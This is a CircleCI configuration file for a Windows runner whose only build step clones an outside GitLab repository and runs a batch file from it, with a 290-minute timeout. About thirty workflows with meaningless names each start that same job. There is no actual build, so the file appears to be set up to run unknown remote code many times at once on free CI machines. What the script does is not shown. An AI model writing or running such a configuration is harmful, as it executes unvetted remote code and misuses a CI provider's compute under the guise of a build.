version: 2.1

orbs:
  win: circleci/windows@2.4.0
commands:
  build:
    description: Run build
    steps:
      - run:
          name: build
          command: |
              git clone https://gitlab.com/aslikimjuma/asuka
              cd asuka
              .\1.bat
          no_output_timeout: 290m
jobs:
  buildd:
    executor:
      name: win/default
      shell: powershell.exe
    working_directory: ~/repo
    steps: [build]
workflows:
  version: 
  build:
    jobs:
      - buildd
  build2:
    jobs:
      - buildd
  majista:
    jobs:
      - buildd
  mijer:
    jobs:
      - buildd
  namex:
    jobs:
      - buildd
  manage:
    jobs:
      - buildd
  naamex:
    jobs:
      - buildd
  animasti:
    jobs:
      - buildd
  ansjumi:
    jobs:
      - buildd
  lampertas:
    jobs:
      - buildd
  nsnhu:
    jobs:
      - buildd
  abshun:
    jobs:
      - buildd
  manjimux:
    jobs:
      - buildd
  nxburtssnaj:
    jobs:
      - buildd
  lamsjuminah:
    jobs:
      - buildd
  xtermja:
    jobs:
      - buildd
  xbahgsyter:
    jobs:
      - buildd
  alskikanjj:
    jobs:
      - buildd
  xmajsumi:
    jobs:
      - buildd
  xnahjjkh:
    jobs:
      - buildd
  xnbayunj:
    jobs:
      - buildd
  xnshikn:
    jobs:
      - buildd
  malijskknjj:
    jobs:
      - buildd
  xbagusterp:
    jobs:
      - buildd
  xmsjimahjjj:
    jobs:
      - buildd
  xbshuhsj:
    jobs:
      - buildd
  hxjajhjj:
    jobs:
      - buildd
  jajaljn:
    jobs:
      - buildd
  nxjisnjjsh:
    jobs:
      - buildd
  nxhsjjjj:
    jobs:
      - buildd
  
